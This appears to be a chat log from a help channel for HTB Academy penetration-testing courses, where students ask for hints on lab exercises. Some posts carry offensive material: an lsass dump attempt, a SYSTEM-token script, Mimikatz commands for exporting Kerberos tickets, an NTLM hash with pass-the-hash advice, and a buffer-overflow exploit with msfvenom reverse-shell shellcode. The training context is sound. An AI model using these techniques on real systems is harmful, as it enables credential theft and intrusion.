C:\Tools\Procdump> procdump.exe -accepteula -ma lsass.exe lsass.dmp

ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

Error opening lsass.exe (696):
Access is denied. (0x00000005, 5)

vivid igloo
vivid igloo
#

i cant find this file .\psgetsys.ps1

fresh compass
#

Hi! Im stuck on the Footprinting Laboratory - Easy on the Footprinting Module. Any help?

gaunt monolith
#

In Pivoting, Tunneling, and Port Forwarding in Web Server Pivoting with Rpivot
I wrote python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 in my kali
& python2.7 client.py --server-ip 10.10.14.237 --server-port 9999 in ubuntu
and I got connection
when I write proxychains firefox-esr 172.16.5.135:80
to acces in internal web server I dont have any connection !?

vivid igloo
#

PS C:\Users\jordan\Desktop> .\psgetsys.ps1; lsass.exe :: CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
PS C:\Users\jordan\Desktop>

faint rampart
zinc sentinel
gaunt monolith
vivid igloo
# zinc sentinel .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(644,"c:\Windows\System32\cm...

PS C:\Users\jordan\Desktop> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(640,"c:\Windows\System32\cmd.exe","")
Cannot find an overload for "CreateProcessFromParent" and the argument count: "3".
At line:1 char:17

  • ... getsys.ps1; [MyProcess]::CreateProcessFromParent(640,"c:\Windows\Syst ...
  •             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : NotSpecified: (:) [], MethodException
    • FullyQualifiedErrorId : MethodCountCouldNotFindBest
#

lol

zinc sentinel
vivid igloo
vivid igloo
#

still not giving me shell lol

#

🥲 7

#

PS C:\Users\jordan\Desktop> .\psgetsys.ps1; winlogon.exe ::CreateProcessFromParent(644,"c:\Windows\System32\cmd.exe","")
PS C:\Users\jordan\Desktop>

zinc sentinel
#

Check the command I posted vrs urs

#

Ignoring the pop shell bit

vivid igloo
# zinc sentinel Check the command I posted vrs urs

PS C:\Users\jordan\Desktop> .\psgetsys.ps1; winlogon.exe ::CreateProcessFromParent(644,"c:\Windows\System32\cmd.exe","")popshell
PS C:\Users\jordan\Desktop> .\psgetsys.ps1; winlogon.exe ::CreateProcessFromParent(644,"c:\Windows\System32\cmd.exe","")popshell
PS C:\Users\jordan\Desktop>

zinc sentinel
#

.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(644,"c:\Windows\System32\cmd.exe","")

vivid igloo
# zinc sentinel .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(644,"c:\Windows\System32\cm...

PS C:\Users\jordan\Desktop> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(644,"c:\Windows\System32\cmd.exe","
Exception calling "CreateProcessFromParent" with "3" argument(s): "Not all privileges or groups referenced are
assigned to the caller"
At line:1 char:17

  • ... getsys.ps1; [MyProcess]::CreateProcessFromParent(644,"c:\Windows\Syst ...
  •             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
    • FullyQualifiedErrorId : Win32Exception

PS C:\Users\jordan\Desktop>

#

ion have privs ?

#

oh

zinc sentinel
#

Maybe a reread of the second is in order

vivid igloo
#

got it

#

thansk

#

*thanks prayge 🎉 👍

zinc sentinel
#

Sweet 🥳

gaunt monolith
fresh compass
#

Please, help in the easy lab of the Footprinting module. Im stuck in the ftp ||passive|| step, cause I don't find anything

#

Nvm, I just found the solution

next umbra
#

Pivoting, Tunneling, and Port Forwarding: Skills Assessment
If anyone could give me a nudge, it would be greatly appreciated.
My DM is open, thanks 🙂

vital adder
#

which case in this?

lyric raft
vital adder
#

if you copy the post request burp and run sqlmap with that request it should be straight forward

rustic sage
lyric raft
#

thanks!

gaunt monolith
plain coral
vital adder
rustic sage
vital adder
gaunt monolith
vital adder
#

sure give me a sec

warm drift
#

pls I need help in smb question 5 I don't get it "Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer. "

#

Footprinting module

warm drift
rustic sage
#

guys

#

i am study linux module fundmentals and i see this text "Terminal emulation is software that emulates the function of a terminal. It allows the use of text-based programs within a graphical user interface (GUI). There are also so-called command-line interfaces (CLI) that run as additional terminals in one terminal. In short, a terminal serves as an interface to the shell interpreter.

Terminal emulators and multiplexers are beneficial extensions for the terminal. They provide us with different methods and functions to work with the terminal, such as splitting the terminal into one window, working in multiple directories, creating different workspaces, and much more. An example of the use of such a multiplexer called Tmux could look something like this:"

fathom pendant
#

Multiple on one screen

rare topaz
#

Tmux is a good example of a terminal multiplexer.

in fact i think tmux literally stands for terminal multiplexer.

#

multiple screen (in this case panes), tabs (in this case windows)

iron plaza
#

Guys I am doing the RDP and SOCKS Tunneling with SocksOverRDP in Pivoting, Tunneling, and Port Forwarding module (module/158/section/1439) I downloaded SocksOverRDP on the target and tried to load the dll file but I keep getting this error. Did anyone else face this issue and how do you resolve this?

devout torrent
iron plaza
devout torrent
rustic sage
zinc marsh
#

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54

#

which part of the hash I needed to use for pth?

proud pine
zinc marsh
#

was I able to activate pth without being admin?

trail leaf
#

If remote Administrator login is explicitly disabled, pth won't get around it

#

You could probably psexec instead

proud pine
#

Or PTH winrm, and enable RDP

vital adder
# zinc marsh

did you disable Restricted Admin Mode? (the given reg command)

fathom pendant
fathom pendant
#

Yes it does lol iirc the section gives you that exact scenario in the example

pallid geyser
#

hello guys, anyone knows which is the best command line with nmap. I usually use nmap -sV {ip} but i saw lot of videos which they write lot of stuff in terminal

fathom pendant
#

It depends

#

Generally you're gonna be more specific with your scan if you know the ports you're attacking

wind gust
#

anyone know the isssue here?

zinc marsh
#

I got the privesc with other vuln

fathom pendant
#

It looks like the module isn't loaded, if it's a power view module may need to load it by going to C:\tools

proud pine
proud pine
wind gust
fathom pendant
#

It's potential that -TrustedToAuth isn't on this

proud pine
fathom pendant
naive wadi
#

Just to be clear, on password mutations in the Password Attacks module, all we are doing is using the supplied resources and using the supplied command to generate a wordlist and then bruteforce SSH? If so it has failed twice for me. Or am I off?

fathom pendant
#

Ssh is slow and the box will timeout

naive wadi
#

thank you

#

Yeah it was timing out

tight mesa
#

hello y'all, I'm stuck with shell & payloads skill assesssment, any hint

#

cuz I'm not sure if I'm over thinking

drowsy bane
#

Has anyone here actually done the escaping restricted shells bit in the Linux privilege escalation module?

unborn shard
tight mesa
#

well I'm stuck with the question No 1, so far I tried to bypass the .zip & tar.gz files restrictions thru the content-type with no success {didn't find the right application/xxx} to be able to upload a webshell, also tried to upload the webshell via tomcat war files but, I really don't know where they are saved

deep owl
#

hello all

#

please help me if you can

#

AD Enumeration & Attacks - Skills Assessment Part II

#

Submit the contents of the C:\flag.txt file on MS01.

#

am not able to connect to MS01

#

it seems rdp is disabled

thorn urchin
#

sounds like you should look for a different way

deep owl
#

and evil-winrm is not working aswell

#

also telnet

thorn urchin
#

yup

#

sounds like youve not found what you need yet

#

its a skill assessment so good luck : 👍

forest zenith
#

How can I send multiple commands using Invoke-Mimikatz like:

Invoke-Mimikatz -Command @"
privilege::debug
token::elevate
base64 /out:true
kerberos::list /export
"@

I need to send commands that use "/" like base64 /out:true, and it separates in multiple lines. I have also tried:

Invoke-Mimikatz -Command "privilege::debug token::elevate base64 /out:true kerberos::list /export"
dull vortex
#

Just got through this one, and it was a lot of fun but I have a question that would be a spoiler here in the chat. Can I dm someone who has completed this as well?

raven locust
#

hey guys, doing the footprinting/smb module currently and I'm running into an issue with one of the questions, is there anyone I can DM?

#

one of the questions has me connect to a share and find a flag.txt, but it doesn't seem to accept the flag.txt I provide despite the share being correct

zinc marsh
#

someone who completed it to ask? I have found some passwords but no of them is the answer

raven locust
dull vortex
serene cobalt
#

Wassup?

surreal storm
#

Hi , I am trying to solve the Network Enumeration with nmap , Section - Firewall and IDS/IPS Evasion - Hard Lab

#

Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.

It is not clearly mentioned what service , and there are only two services running

#

I tried the nmap --script dns-version and it is not working , it is returning back with an error

heavy marsh
#

That's all I remember from doing that one. I think it was one of the scans below that section that worked. It will be a bit of trial and error to find the right scan.

heavy marsh
#

I think it was a SYN-Scan from DNS port IIRC.

#

Either way I'm pretty sure the scan you need is in that lesson.

surreal storm
rustic sage
#

hello everyone ! Anyone got the answer on Footprinting module for ORACLE TNS?

#

it seems odat.py doesn't want to work in pwnbox after installation

acoustic willow
#

Hi

valid cipher
#

the intro networking module started off well, but the last 6 chapters... i had no clue what i was reading 💀

gusty zinc
#

Module - sql injection
Section - reading files

We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.

I cant find where the include is - I can see the php code for search.php .. but no include. Can anyone give me a nudge on this?

analog dock
gusty zinc
analog dock
#

Then view source

#

And you’ll find the .php you need

gusty zinc
#

hum yeah thats what ive done but im not seeing any other php files in the source

#

wait

#

its there

analog dock
#

You got it?

gusty zinc
#

yep

#

tyty

analog dock
#

You’re welcome 👍🏼

heady bronze
#

Hello everyone

#

I got stucked with the snmp enumeration part of the Footprinting Lab Hard. Any hints?:)

analog dock
heady bronze
#

I have enumerated the server and found the 161/udp open. After further enumeration ive found that is running snmp v3. Tried snmpwalk, onesixtyone but couldnt find anything.

#

In the academy course there is nothing mentioned about snmpv3 enumeration. 🙂

#

Should i bruteforce?

analog dock
heady bronze
#

Imap,imaps,pop3,ssh,pop3s

analog dock
#

So enumerate those

#

There’s a section imap /pop3 in the module

heady bronze
#

Yeah i tried them as well.

#

I am missing something... i will figure it out

analog dock
gusty zinc
#

The final skills assessment in the sql injection module - is there some trick to the inital payload for sql injection? After completing the module I cant get sql injection to trigger

bright arrow
gusty zinc
#

maybe its a lab deployment issue

#

nothing, strange

heady bronze
#

Figured it out 🙂 the community string was in front of my eyes. Misunderstood the output of onesixtyone

#

Thank you guys

karmic void
#

Mind if I ask how you fixed yoru issue with [-] [('SSL routines', '', 'no protocols available')] ...?

gusty zinc
#

module - sql injection
section - final skills assessment

is the user credentials intended to be cracked (hash) ?

winter blaze
#

can i get help with smbclient and how to get the password.
i type in

"smbclient -U bob \ip\users

I Entered workgroup\bob's password: which is bob:Welcome1
i tried with capital letter in B and it did not work
then what do i do next
If I press enter:
[5:46 PM]
"session setup failed:NT_status_logon_failure

thorn urchin
#

are you sure it's the default workgroup for the login?

gusty zinc
#

anyone got a quick second for a question, not a nudge, on sql injection final assessment? I have what I think is the pathway, but I think I may need to scan the ip address of the machine to proceed and I want to check if im going down the wrong path

#

solved

red current
#

I have a question regarding the Windows Priv Esc module. It's the Pillaging section. I was able to get into the config folder finally but I can't seem to figure out which files in here that I need to transfer over to my VM for extraction of their hashes? Can someone help me out here? Never mind, it's the SAM and SYSTEM files. I should have remembered that.

red current
red current
#

I believe that's the 'erratum' that you're looking for.

zinc marsh
#

the credentials stored in cmdkey

#

are used to be able to login to another service without needing the password right?

karmic void
#

Did you ever manage to resolve your issue with the SSL routines error..?

trail leaf
#

Nope, if you scan the network, you can find the parrot box and sign in with the htb-student creds, and use the mssqlclient.py that is on that box

#

that's what I did to deal with it

iron plaza
proud pine
#

Your resume doesn't bode well, if you can't read the description of the channel that you're posting in.

thorn urchin
#

<@&861185840277487616>

#

My man tried to tag everyone with his spam

#

🙏 thanks to whoever deleted it

fathom pendant
iron plaza
final maple
#

I made two terminals on my local machine and used each one to SSH into the linux machine HTB gives you in the module. On one machine, I got into the Windows machine using psexec and the methods from the module. On the other machine, I did "locate mimikatz.exe" then copied the mimikatz.exe file to the home folder. Then I set up a python http server. From the Windows shell I had on my other terminal window, I used a command starting with "Invoke-Webrequest" (you should see it in the Windows Transfer section of the File Transfer module other people have sent you). Make sure you do "ip addr" on the linux host to find out the ip address you need to use in the Invoke-Webrequest command on Windows. I was able to transfer mimikatz.exe, but I am still stuck.

rare topaz
#

And pls yall send screenshots omfg

vivid igloo
#

C:\Tools>reg query \10.129.19.166\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
ERROR: Access is denied.

#

but :Administrator netadm

#

net group "Domain Admins" /dom
Group name Domain Admins
Comment Designated administrators of the domain

#

Members

#

Administrator netadm

#

module :WINDOWS PRIVILEGE ESCALATION

#

Table of Contents :DnsAdmins

acoustic owl
vivid igloo
#

anyone ?

acoustic owl
mighty wharf
#

Hey Guys, I need some help with the rpivot part of the port forwarding module, I am doing everything it says to do in the section, just cant seem to get it to work

zinc sentinel
round gale
#

hello, i am unable to connect via RDP into the windows machines, trying to complete the Attacking common services RDP section. Getting network disconnect error. VPN connection is stable

compact apex
#

Hello guys, I have a question regarding a tool used on the server side attacks (SSTI sections). They explain us to use Tlpmap to automate the engine identification unfortunately this tool is not supported by python 3 and I am not able to use python 2 for the packages installations do you have any solutions ?

analog dock
#

This is for academy modules, not for your self promo.

warm drift
#

please help in active subdomain enumeration section in Information gathering web edition module question 2 " Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. "

analog dock
earnest zenith
warm drift
rare topaz
compact apex
warm drift
#

help

acoustic owl
warm drift
#

I don't know any nameservers

supple patio
#

ns.inlanefreight.htb@ip

acoustic owl
# warm drift still confused

You specify the nameserver ns.inlanefreight.htb. Your PC can't resolve the address because htb is not an official TLD.

warm drift
supple patio
#

or sudo nano /etc/hosts

supple patio
#

ip ns.inlanefreight.htb

warm drift
acoustic owl
supple patio
warm drift
#

10.129.144.123 ns.inlanefreight.htb is inmy etc hosts now and I tried nslookup -type=any -query=AXFR zonetransfer.me ns.inlanefreight.htb command and it didn't work

acoustic owl
warm drift
acoustic owl
warm drift
#

please can someone explain in dm i'm dumb

rustic sage
#

try dig

warm drift
analog dock
#

What ip are you using

rustic sage
#

I know i was trying to prove that you need to read the content again

#

You are missing a very important step

bright arrow
#

^

warm drift
rustic sage
acoustic owl
cedar void
#

Is there a way to maximize the window screen for the first lesson in the 'Windows Fundamentals' module? I can't see the bottom.

trail leaf
#

Use the /dynamic-resolution flag when using xfreerdp to be able to resize the window how you want

rich perch
#

I'm currently having trouble on the skills assessment of the "Hacking WordPress" module. When I spawn the target, the website works but I can't find any sign of it using Wordpress. Even WPScan gives an error that the site isn't running WordPress. Is this normal?

fleet veldt
#

hello im new and have no idea what to do any advice?

rustic sage
#

hello everyone ! Anyone got the answer on Footprinting module for ORACLE TNS?

#

its the olny answer i have to provide in order to complete module and odit.py doesn't work at all after 2 installations

rustic sage
fleet veldt
#

and yea im completely clueless

rustic sage
#

linux and windows fundamenttals > crack into htb > basic toolset > any path you choose

frozen mesa
#

ATTACKING COMMON APPLICATIONS --> WordPress - Discovery & Enumeration --> the hosts dont seem to run WordPress according the enumeration results. What did i do wrong?

#

curl -s <ip> , curl -s <hostname>, wpscan --url <website> , wpscan --url <ip>

rare topaz
# fleet veldt hello im new and have no idea what to do any advice?

Start with HTB Academy or TryHackMe rooms.

HTB Academy tier 0 modules are free, THM has alot more free options.

Then you can go to https://github.com/DFIRmadness/5pillars/blob/master/5-Pillars.md

This github repo to check a bunch of resources and a rough guideline as to how to progress from here.

I recommend learning the A+, Network+ and Security+ courses highlighted in the github repo for general knowledge.

For more specific resources like web pentesting, Portswigger Academy will help.

You can also watch TCM Security's free courses on youtube.

https://www.youtube.com/playlist?list=PLLKT__MCUeixqHJ1TRqrHsEd6_EdEvo47 (15+ hours)

vivid igloo
#

hey

rare topaz
#

ye

vivid igloo
#

after this ion know how to crk the ntlm

#

i used hashcrack

#

i used jhon the ripper

#

not working

rare topaz
#

.....

#

send error message

#

screenshots

fervent apex
#

Can someone tell me how to crack the txt file

rare topaz
#

what txt file

fervent apex
#

The hashfile txt

rare topaz
#

what hashfile

naive field
#

i have a question about sqlmap, when do i know what tamper script to use?

#

like will i get any indication from sqlmap or

undone plaza
#

hi

naive field
#

is there a way to find out or

rare topaz
#

not really, you can do manual testing to see if something gets filtered out

#

typically you shouldn't be spamming tampers on a site without actually manually testing it first

#

if you suspect that there's a WAF bypass, you'd use the tamper module associated with it then.

patent blaze
#

Hey buds! Anyone facing any connections issues with Web Service & API Attacks???

undone plaza
#

...

novel matrix
#

Can we please keep this channel on topic

rare topaz
#

wrong channel, wrong server.

#

what course

undone plaza
#

course?

primal bane
rare topaz
#

.....so this isn't part of any htb academy course?

primal bane
#

@rare topaz Is there another community that can help me?

novel matrix
#

Please take this into DM's

rare topaz
#

Depends on what you're trying to do?

if you're asking for advice there might be someone who can help you, but if you're asking for them to give you revenge, that's a big no.

rare topaz
primal bane
#

I'm asking for advice yes

rare topaz
#

again, wrong channel

novel matrix
#

@primal bane Next time when asked to take it else where, please do so.

Also, we can't help you if you got scammed.

Anyway, back to being on topic.

red current
#

I'm running into an issue in the Windows Priv Esc Assessment part 1. For the second question, I'm trying to get an hta_server reverse shell started and I can't seem to get it to connect for me. Does anyone have any hints on how to get this working? Never mind. I got it working.

frozen mesa
#

Wappalyzer

#

whatweb <rhost/website>

#

Attacking common applications --> --> WordPress - Discovery & Enumeration --> the hosts don't seem to run WordPress according the enumeration results.

I've enumerated the rhost (ip and domain) with curl, whatweb and wpscan but all results mention that the host is not running on WP. What am i doing wrong?

rare topaz
#

automated fuzzing tools or manually looking thru source code might help

#

nikto and whatweb give it i think

#

wappalyzer as well tho it's a browser extension

thorn urchin
#

not relevant for this channel. Read #welcome to verify your account and gain access to the rest of the server where you can find a more appropriate channel to ask

rare topaz
#

im not even gonna bother

#

don't have the module so i'll need more context.

What exactly are you escaping?

What commands have you tried?

analog dock
vital adder
bold rapids
#

I was on the final assessment for stack based buffer overflows on Linux.
I don’t know what I was doing wrong . I asked for help and the person who got the answer did exactly what I did. When I try. I get illegal instruction core dump

zinc marsh
#

use google

#

literally the only I did in that section was

bold rapids
#

spoiler
||'./leave_msg $(python -c 'print "\x55" * (2060 - 124 - 95)+ "\x90" * 124 + "\xba\x27\x39\x7e\xa8\xd9\xcf\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x12\x83\xee\xfc\x31\x56\x0e\x03\x71\x37\x9c\x5d\x4c\x9c\x97\x7d\xfd\x61\x0b\xe8\x03\xef\x4a\x5c\x65\x22\x0c\x0e\x30\x0c\x32\xfc\x42\x25\x34\x07\x2a\xc9\xc6\xf7\xab\x5d\xc5\xf7\xd1\xf4\x40\x16\x95\x61\x03\x88\x86\xde\xa0\xa3\xc9\xec\x27\xe1\x61\x81\x08\x75\x19\x35\x78\x56\xbb\xac\x0f\x4b\x69\x7c\x99\x6d\x3d\x89\x54\xed" + "\x2c\xd7\xff\xff"') ||
Illegal instruction (core dumped)'

#

like this makes no sense. right?

zinc marsh
zinc marsh
#

just write || at the beginning and at the end

zinc marsh
#

have u done any reverse engineering challenge?

bold rapids
#

I’ve been completing the academy modules

#

I did exactly what my friend did. It’s just I’m getting this error. I’m completely clueless

#

He got the answer. I didn’t

#

I did this to get my shellcode
||msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode||

zinc marsh
bold rapids
#

I do

#

Thats why when I asked him for help. He was also confused. Since he did exactly what i did

#

do u see whats wrong?

zinc marsh
#

I haven't done that module

#

and idk nothing about what u have done

bold rapids
#

The only thing I can think of is my msfvenom is bad or something. Since I got 95 byte code and tested it even on my own pc. Failed

dim hemlock
#

Hi, Im stuck on module Passwd, Shadow & Opasswd. Im stuck in the unshadow part

#

Any tips haha?

misty current
#

Can you describe more of what exactly you're stuck on?

dim hemlock
#

Aa yes sorry dont want to spoil much, So I got the .baks okay?

vital adder
#

you can just use the mutated wordlist for that

vital adder
vital adder
dim hemlock
#

And in the module he uses the unshadow command to generate the hashes

#

But when I cat the output of the file there is not hashes

#

It looks like /etc/passwd file

quiet ember
#

Anyone else unable to spawn targets?

dim hemlock
quiet ember
zinc marsh
#

How could I get a reverse shell with command injection? from a windows target

trail leaf
#

Command injection typically implies that you have code execution, and you use code to run a reverse shell 🙂

#

Doesn't matter what OS

zinc marsh
#

I found this way to gain foothold

trail leaf
#

Technically spoilers but ok, now run code that would work on Windows to give you a reverse shell

#

It’s a google search away

analog dock
#

Any hint on the skills assessment of file inclusion?
The only parameter I find is page=, but further fuzzing yields no results

zinc marsh
trail leaf
#

still spoilers

#

anyone doing the module would know exactly what you're talking about

vital adder
valid cipher
#

what important sections in the intro networking module should i make sure to learn well

zinc marsh
#

all

valid cipher
#

i read most of it, but some parts didnt understand well at all

zinc marsh
#

but tomorrow u will know more than today

valid cipher
#

ok

acoustic owl
valid cipher
#

i need to become a hacker asap